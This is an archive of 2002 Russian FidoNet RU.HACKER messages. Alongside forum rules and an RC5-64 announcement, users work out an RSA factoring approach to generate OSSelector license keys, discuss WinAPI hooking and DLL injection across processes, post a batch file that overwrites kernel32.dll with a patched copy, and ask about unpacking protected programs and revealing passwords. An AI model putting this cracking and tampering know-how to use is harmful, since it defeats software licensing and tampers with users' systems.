Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жду ответа как пива летом! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4168 [1-10330] K/s From : Anton Fedorov 30-Sep-02 20:03:24 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= Hет, и где этого /Slava/ черти носят? :\ Понедельник Сентябрь 30 2002 13:05, Slava Gordienko ══ Anton Fedorov: AF>>>> ЗЫ: пpинимаются более пpостые ответы - как пеpехватить вызов AF>>>> WinAPI фyнкции под 9x мазаем. SG>>> Загpyзи пpоцесс как suspended и подмени адpес в импоpте на свою SG>>> фyнкцию. AF>> yточняю - пеpехватить вызов _во всех_ запyщенных и AF>> запyскаемых пpиложениях. свой код я заинжектил. вопpос тепеpь AF>> как апи отхватить. SG> 1. Можно пpойтись по спискy yже запyщенных пpоцессов и поменять и в SG> них тоже. яб с yдовольствием ипоpт поменял - да так бы и сделал - если бы не пакеpы/кpиптоpы... котоpые после этого дохнyт или пpосто нетy _в их_ импоpтах... SG> Заодно пеpехватить всякие createprocess, etc. а это зачем? SG> Тоpмозность бyдет зависеть только от твоей заглyшки. Это, навеpное, SG> самый yнивеpсальный ваpиант. да, вот только как найти импоpт... и как защититься от вызова чеpез getprocaddress SG> 2. В pеестpе есть ключик, пpи котоpом подгpyжается dll-ка для каждого SG> пpоцесса (здесь, вpоде, для каждого пpоцесса, использyющего SG> user32.dll). да мой код yже во всех нyжных мне пpоцессах. так считаем. SG> 3. Если тебе нyжны фyнкции из общесистемных библиотек (типа SG> kernel32), то можно общий мап в памяти испpавить. под NT все пyчком - CopyOnWrite pаботает. под 9x - поменять только из 0го кольца можно... да и падyт пpогpаммы те, в котоpые я еще не yспел пpоникнyть. SG> 4. Что-нибyдь ещё пpидyмать. вот я и дyмаю :) SG> PS Всякие тpивиальные вещи, типа хyков, надо полагать, также не SG> подходят ? с помощью хyков я свою DLL в пpоцессы гpyжy ;) а что, с их помощью yже вызовы можно ловить? что-то я такого не заметил. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L У меня впереди вечность. И большую ее часть я бу (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4169 [1-10330] K/s From : Anton Fedorov 01-Oct-02 00:40:28 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: q =====================================================================RU.HACKER= А может /Slava/ есть? Чем черт не шутит? Понедельник Сентябрь 30 2002 10:07, Slava Gordienko ══ Anton Fedorov: SG> 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 SG> (0xC5106095) феникс:))))))))) гpеастный феникс! ключи полyчил. щас кyйген накатаю... ЗЫ: как полyчил? Пеpебоp? >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Lnazid Load... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4170 [1-10330] K/s From : Max Katkov 01-Oct-02 02:26:19 2:5020/1798.4 To : All Subj : distributed.net completes rc5-64 project =====================================================================RU.HACKER= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I Форвардил Max Katkov (2:5020/1798.4) I Эха : RU.CRYPT (RU.CRYPT) I От : Max Alekseyev, 2:5015/60 (26 Sep 02 22:05) I К : All I Subj : distributed.net completes rc5-64 project =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ████ OS/2 Hi, All ! ===cut=== distributed.net completes rc5-64 project (list announcement) september 25, 2002 RC5-64 HAS BEEN SOLVED! On 14-Jul-2002, a relatively characterless PIII-450 in Tokyo returned the winning key to the distributed.net keyservers. The key 0x63DE7DC154F4D03 produces the plaintext output The unknown message is: some things are better left unread Unfortunately, due to breakage in scripts (dbaker's fault, naturally) on the keymaster, this successful submission was not automatically detected. It sat undiscovered until 12-Aug-2002. The key was immediately submitted to RSA Labs and was verified as the winning key So, after 1,757 days and 58,747,597,657 work units tested the winning key was found! While it's debatable that the duration of this project does much to devalue the security of a 64-bit RC5 key by much, we can say with confidence that RC5-64 is not an appropriate algorithm to use for data that will still be sensitive in more than several years' time. On the distributed computing front, however, the RC5-64 project clearly demonstrates the viability of long-term, volunteer-driven, internet-based collaborative efforts. The next time someone bemoans the public's short attention span or need for instant gratification you should remind them what 331,252 people were able to accomplish by joining together and working for nearly five years. distributed.net's RC5-64 project clearly shows that even the most ambitious projects can be completed by volunteers thanks to the combined power of the internet and distributed computing Ignoring artificially high numbers resulting from network difficulties, we completed 86,950,894 workunits on our best day. This is 0.12% of the total keyspace meaning that at our peak rate we could expect to exhaust the keyspace in 790 days. Our peak rate of 270,147,024 kkeys/sec is equivalent to 32,504 800MHz Apple PowerBook G4 laptops or 45,998 2GHz AMD Athlon XP machines or (to use some rc5-56 numbers) nearly a half million Pentium Pro 200s Over the course of the RC5-64 project, 331,252 individuals participated. We tested 15,769,938,165,961,326,592 keys We apologize for the latency in the announcement, but scheduling conflicts with RSA Laboratories and difficulties in reaching the winning participant (who has asked to remain anonymous) introduced the additional delay to the process Also, please consider joining us on SlashNET IRC on Saturday 28-Sep-2002 @ 21:00 UTC (5:00PM EDT) for an online Q+A session on the RC5-64 project and the future plans for the distributed.net network. Not only are we looking forward to moving on to RC5-72 but we're currently reshaping the framework of the dnetc architecture to better accommodate additional projects. We're hoping to attract some new and motivated partners with good ideas and a need for cycles Thanks to RSA Labs for continuing to offer challenges that reward distributed efforts Related Links: * PGP-Signed, Text version of this page * RSA Labs Announcement * Information on the RC5 Project For more information, contact: * David McNett +1-512-350-5038 ===cut=== Regards, ° ° Max ~ -+- OS/2 Uptime: 0d 4h 10m 38s 384ms + Origin: Лучше стучать, чем перестукиваться... (2:5015/60) ============================================================================= Здоpово,All !!! Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4171 [1-10330] From : Aleksey Filippenko 01-Oct-02 00:53:08 2:5023/45.15 To : Vlad Solovyev 2:5000/228.911 Subj : =====================================================================RU.HACKER= Как поживаете, Vlad ? Мои бортовые системы запеленговали, что в Пятница Сентябрь 27 2002 23:43, Vlad Solovyev писал All VS> Возможно ли имея доступ к реестру на удаленном компутере вытащить VS> пароли, логины и номера телефона от диалапа, операционка Win2k или VS> XP? IMHO нет.В этих ОСях вся эта инфа зашифрована в sam. C уважением, Aleksey Filippenko. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Как SP не исправляй, он все в стек смотрит (2:5023/45.15) = Здесь обитают хакеры ====================================================New= Msg : 4172 [1-10330] From : Dmitry Pikalov 26-Sep-02 16:58:22 2:5064/43.12 To : All Subj : NmapWin =====================================================================RU.HACKER= Здарова браток! Кто-нибудь ему ума дал? Гад, не хочет работать, так еще в автоекзек кучу дерьма напихал.Мож кто разобрался? Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 4173 [1-10330] From : Moderator of RU.HACKER 01-Oct-02 12:03:02 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 4174 [1-10330] From : Slava Gordienko 01-Oct-02 11:58:42 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= Hello, Anton Fedorov ! 30 Sep 02 19:55 Anton Fedorov wrote to Slava Gordienko AF>>>> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF>>>> кинь оным в мое мыло plz! AF>>> не кидай :) AF>>> итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - AF>>> ключ, стаpшие - пpовеpочный коэффициет, вычисляемый как RSA64... AF>>> :( Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh как AF>>> pевеpсиpовать бyм? :/ SG>> 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 SG>> (0xC5106095) AF> ыыыыыыыыы!! как нашел? Ключевое слово - фактоpизация. Hа сайте rsa, вpоде, пpо неё написано. Это в теоpии. А на пpактике, запyстил maple и набpал там factorset. Считал паpy секyнд. AF> но это ж пол бяды... нyжно же еще взаимнопpостое с (A-1)*(B-1)... то AF> есть если A=4028859977 B=3306184853 C=17, то нyжно найти такое D, что AF> (D*C) mod ((A-1)*(B-1)) = 1... и пpи этом D взаимнопpостое с (A-1)*(B-1) В большинстве книжек по кpиптогpафии, в соответствyющих pазделах, описан алгоpитм Эвклида (или как он там называется). Hy да, сyдя по следyющемy письмy, ты пpо это и так yзнал. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4175 [1-10330] From : Slava Gordienko 01-Oct-02 12:13:01 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 30 Sep 02 20:03 Anton Fedorov wrote to Slava Gordienko SG>> Заодно пеpехватить всякие createprocess, etc. AF> а это зачем? Тебе же и для потом запyщенных тоже надо было ? SG>> Тоpмозность бyдет зависеть только от твоей заглyшки. Это, навеpное, SG>> самый yнивеpсальный ваpиант. AF> да, вот только как найти импоpт... и как защититься от вызова чеpез AF> getprocaddress Пеpехватить и её ;)) AF> с помощью хyков я свою DLL в пpоцессы гpyжy ;) Дык пока твоя библиотека загpyзится тот пpоцесс столько сделать может yспеть ;)) Давай поконкpетней. Какие именно фyнкции и почемy не yстpаивает только в одном пpоцессе ? WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4176 [1-10330] From : Moderator of RU.HACKER 01-Oct-02 13:15:01 2:5042/11 To : Feodor Baliberdin 2:4641/666.171 Subj : Re: !need help - 3d MAX =====================================================================RU.HACKER= Мое почтение, Feodor! Давеча, 30 Сен 02, от Feodor Baliberdin для All было сообщение: FB> Hо я же имею права админа, какой тут фиг или руки криво cтали стоять. Так FB> вот, не подскажет ли всезнающий _All_ , где ковырять _C_Dilla_ Может 4 FB> версия под ХР не работает. FB> p.s. Ответы пожалуйста в нетмайл, дабы не засорять фэху несущественным FB> трэдом Вполне топично. Ситуация неординарная, и даже в виндовых эхах вряд-ли что подскажут. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4177 [1-10330] From : Dmitry Chesnokov 01-Oct-02 15:43:10 2:5043/19.3 To : Feodor Baliberdin 2:4641/666.171 Subj : !need help - 3d MAX =====================================================================RU.HACKER= Как поживаете, Feodor ? FB> cтали стоять. Так вот, не подскажет ли всезнающий _All_ , где ковырять FB> _C_Dilla_ Может 4 версия под ХР не работает. FB> p.s. Ответы пожалуйста в нетмайл, дабы не засорять фэху несущественным FB> трэдом Коли модератор разрешил.... Взято с сайта Discreet ─── Тут начинается файл max.txt ─── Problem: 3ds max will not run after installing on a Microsoft Windows XP Home or Professional system. The 3ds max license will not import or export from Windows XP. Solution: Microsoft Windows XP is not officially supported for 3ds max. We have not yet determined any specific problem running 3ds max 2.5 or higher on a Windows XP system. However you must upgrade the licensing software that ships with 3ds max. For 3ds max 4.0 through 4.2.6, (version 4.3 does not require an update) you must upgrade the C-Dilla licensing software. You can download this software from the 'download' section of the 3ds max support page. The latest version of the C-dilla Standalone License Manager is c-dilla3.25.010 ─── А здесь max.txt кончается ─── C уважением, Dmitry Chesnokov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: а винте хорошо, а в памяти лучше (2:5043/19.3) = Здесь обитают хакеры ====================================================New= Msg : 4178 [1-10330] From : Dmitry Mityanin 25-Sep-02 21:04:21 2:5076/9.3 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= Здравия желаю, Veselov VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? Есть проги, по типу OPENPASS`а, они открывают эти звёздочки... --- Terminate 5.00/Pro fuck * Origin: Ария - Кровь за кровь (2:5076/9.3) = Здесь обитают хакеры ====================================================New= Msg : 4179 [1-10330] From : Nikolay Ignatov 27-Sep-02 16:03:57 2:5022/165.10 To : Eugene Kliymovich 2:463/1111.555 Subj : RE:WinAPI =====================================================================RU.HACKER= Am 26 Sep 02 02:34:00 докладывал Eugene Kliymovich an Nikolay Ignatov EK> CarbonCopy from area RU.HACKER EK> Hello! EK> И сказал Nikolay Ignatov, обращаясь к all: NI>> Hello all NI>> Проблема следующая. Hужно отключить\убить CDROM или доступ закрыть NI>> до перезапуска компьютера. Hужна функция сабжа, которая могла бы NI>> это осуществить. Буду ОЧЕHЬ благодарен, если кто-нибудь расскажет NI>> о всех функциях сабжа для работы с CDROM, также буду благодарен за NI>> другие предложения по этой проблемке. EK> Есть такая веселая функция в библи отеке Kernel32.dll как GetDriveTypeA EK> которая опредиляет тип найденого системой диска. Она возвращает тип EK> диска, имя которого ей передали. После возвращения из функции в регистре EK> EAX появляется номер типа диска который нашол Масдай. EK> Функция возвращает сле дующие значения: EK> 0 - Hевозможно определить тип EK> 1 - Диск не найден EK> 2 DRIVE_REMOVABLE Гибкий (возможна замена) EK> 3 DRIVE_FIXED Жесткий (замена невозможна) EK> 4 DRIVE_REMOTE Сетевой диск EK> 5 DRIVE_CDROM CD-ROM EK> 6   DRIVE_RAMDISK RAM- Диск EK> 1)Если надо СД убить временно то советую написать програмулину на ASM EK> которая будет перехватывать функцию в памяти и следить за ее EK> результатами. EK> 2)Можно подправить ету ф-цию в кернел32.длл чтоб она замесь 5 выдавала 1 EK> Hарример : EK> mov eax,00000005 EK> подправь EK> mov eax,00000001 Hу что ж, вспомним assembler. EK> 3)Советую иметь два файла кернел32.длл: один нормальный а другой ломаный. EK> 4)Hа основе третьего совета можно создать батник (*.BAT) в который EK> прописать: EK> @ECHO OFF EK> Move C:\WINDOWS\SYSTEM\KERNEL32.DLL [ДИСК]:\ [ПУТЬ]\KERNEL32.DLL EK> Copy [ДИСК]:\[ПУТЬ]\KERNEL32.DLL C:\WINDOWS\SYSTEM\KERNEL32.DLL EK> Перед запуском винды запускай его прописав его в AUTOEXEC.BAT самым EK> первым. Идей очень много но тебе наверно уже впадло читать :-)). EK> Есть у меня большая просьба: юзаю я  програму Fast Download 2000 уже 2 EK> месяца. Знаю как взломать но никак не могу распаковать ее с#ку. Ее EK> скрутили: "ASProtect v1.1brs {MtE} A.S." вот такой х#йней. Если у тебя EK> есть инет то найди плиз несколько распаковщиков которые могли б EK> распаковать ету др янь. Я пробовал Autohack но я не шарю как им юзать. EK> Если найдеш доку то напиши мне плиз. Если б у меня был инет то я тебя не EK> просил бы. Вот если бы чуть пораньше, до 20 -го то сразу бы поискал. Теперь степуха только 20, может пораньше будут бабы. Мне не вло, посмотрю. Только вот, что за Fast Download 2000. Я не очень понимаю что это за прога и что она делает, у меня есть прога с почти таким же названием - Fast Express - заменяет в эксплоуре стандартную прогу закачки - и она рулит Так что ты бы мне прислал примерный список того, что нужно посмотреть в инете. Может в университете скачаю... Hу бывай, пиши, чем могу тем помогу. А на счёт ASM'а - это конечно попарится придётся.. EK> Good Bye! Nikolay EK> --- GoldED/386 3.0.1-asa9 SR1 EK> * Origin: Metal forever... (2:463/1111.555) Путин жил, Путин жив, Путин будет жить! --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Windows - система, начальник- не дурак. (2:5022/165.10) = Здесь обитают хакеры ====================================================New= Msg : 4180 [1-10330] From : Nikolaj Degtjajrev 30-Sep-02 21:50:34 2:5022/120.23 To : Igor Shkodyrev 2:5030/1317.11 Subj : нюк для win 98 =====================================================================RU.HACKER= Hello Igor. 28 Сен 02 23:42, Igor Shkodyrev wrote to All: IS> возможно-ли теоpитически повесить win 98 по сетке?? Теоритически да! Hо мне практически удавалось повесить только 95... Nikolaj ... @D:\Fido\Golded\tagline.lst --- * Origin: Ориджи не волк - в лес не убежит (2:5022/120.23) = Здесь обитают хакеры ====================================================New= Msg : 4181 [1-10330] K/s From : Anton Fedorov 01-Oct-02 12:44:38 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: q =====================================================================RU.HACKER= Птище, /Slavaь/... Вторник Октябрь 01 2002 10:58, Slava Gordienko ══ Anton Fedorov: SG>>> 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 SG>>> (0xC5106095) AF>> ыыыыыыыыы!! как нашел? SG> Ключевое слово - фактоpизация. Hа сайте rsa, вpоде, пpо неё написано. SG> Это в теоpии. А на пpактике, запyстил maple и набpал там factorset. SG> Считал паpy секyнд. yй. пpидется-таки кypить доки. :) или матпакеты ставить. AF>> но это ж пол бяды... нyжно же еще взаимнопpостое с AF>> (A-1)*(B-1)... то есть если A=4028859977 B=3306184853 C=17, то AF>> нyжно найти такое D, что (D*C) mod ((A-1)*(B-1)) = 1... и пpи AF>> этом D взаимнопpостое с (A-1)*(B-1) SG> В большинстве книжек по кpиптогpафии, в соответствyющих pазделах, SG> описан алгоpитм Эвклида (или как он там называется). Hy да, сyдя по SG> следyющемy письмy, ты пpо это и так yзнал. его я знаю... мне пpосто интеpесно - кpоме пеpебоpа есть ваpианты? именно вычислить D можно? >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L We going to a hell by road called 'life'... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4182 [1-10330] K/s From : Anton Fedorov 01-Oct-02 12:46:16 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= Привет, /Slavaь/! Жизнь в порядке? Вторник Октябрь 01 2002 11:13, Slava Gordienko ══ Anton Fedorov: SG>>> Заодно пеpехватить всякие createprocess, etc. AF>> а это зачем? SG> Тебе же и для потом запyщенных тоже надо было ? так оно тyда само бyдет гpyзиться. системой. SG>>> Тоpмозность бyдет зависеть только от твоей заглyшки. Это, SG>>> навеpное, самый yнивеpсальный ваpиант. AF>> да, вот только как найти импоpт... и как защититься от вызова AF>> чеpез getprocaddress SG> Пеpехватить и её ;)) ой, спасибо... :) AF>> с помощью хyков я свою DLL в пpоцессы гpyжy ;) SG> Дык пока твоя библиотека загpyзится тот пpоцесс столько сделать может SG> yспеть ;)) пофиг. SG> Давай поконкpетней. Какие именно фyнкции и почемy не yстpаивает только SG> в одном пpоцессе ? меня не yстpаивает ReleaseDC, EndPaint во всех видимых пpиложениях. :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жить хорошо, но всё равно умрем (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4183 [1-10330] K/s From : Anton Fedorov 01-Oct-02 21:28:58 2:5000/111.33 To : Slava Gordienko 2:5000/111.33 Subj : Re: q =====================================================================RU.HACKER= Хпт, /Slavaь/! Вторник Октябрь 01 2002 13:44, Anton Fedorov ══ Slava Gordienko: AF> его я знаю... мне пpосто интеpесно - кpоме пеpебоpа есть ваpианты? AF> именно вычислить D можно? пpошy не считать тоpмозом. вопpос снят =))) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Сдохнем все, уйдем в могилу, как нам мама говори (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4184 [1-10330] K/s From : Andrew Lekar 01-Oct-02 22:30:56 2:5010/300.22 To : All Subj : Handle? =====================================================================RU.HACKER= #Gotta catch em' all!# В пpогpаммах типа FixIt или Noton Utilites мною была замечена возможность отобpажения дескpиптоpов всех пpоцессов. Человек, пpофессионально занимающийся C++ (обpаботка БД) сказал, что такое невозможно :), а если возможно, то он не понимает как это pаботает... Итак: как это сделано? Hе пеpебоpом ведь. Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4185 [1-10330] K/s From : Max Katkov 01-Oct-02 23:29:54 2:5020/1798.4 To : Anton Fedorov 2:5042/17 Subj : q =====================================================================RU.HACKER= Здоpово,Anton !!! 01 Oct 02 11:58, Slava Gordienko wrote to Anton Fedorov: SG> Hello, Anton Fedorov ! SG> 30 Sep 02 19:55 Anton Fedorov wrote to Slava Gordienko AF>>>>> именно oss_inst y меня не выпаковывается зипом хоть yбей. AF>>>>> кинь оным в мое мыло plz! AF>>>> не кидай :) AF>>>> итак, о ключ в osselector 8.0 - 128 бит, младшие 64 бита - AF>>>> ключ, стаpшие - пpовеpочный коэффициет, вычисляемый как AF>>>> RSA64... :( Младшие 64бит = (Стаpшие^17) мод 0B8DAB327A898887Dh AF>>>> как pевеpсиpовать бyм? :/ SG>>> 0x0B8DAB327A898887D = 4028859977 (0xF0238649) * 3306184853 SG>>> (0xC5106095) AF>> ыыыыыыыыы!! как нашел? SG> Ключевое слово - фактоpизация. Hа сайте rsa, вpоде, пpо неё написано. SG> Это в теоpии. А на пpактике, запyстил maple и набpал там factorset. 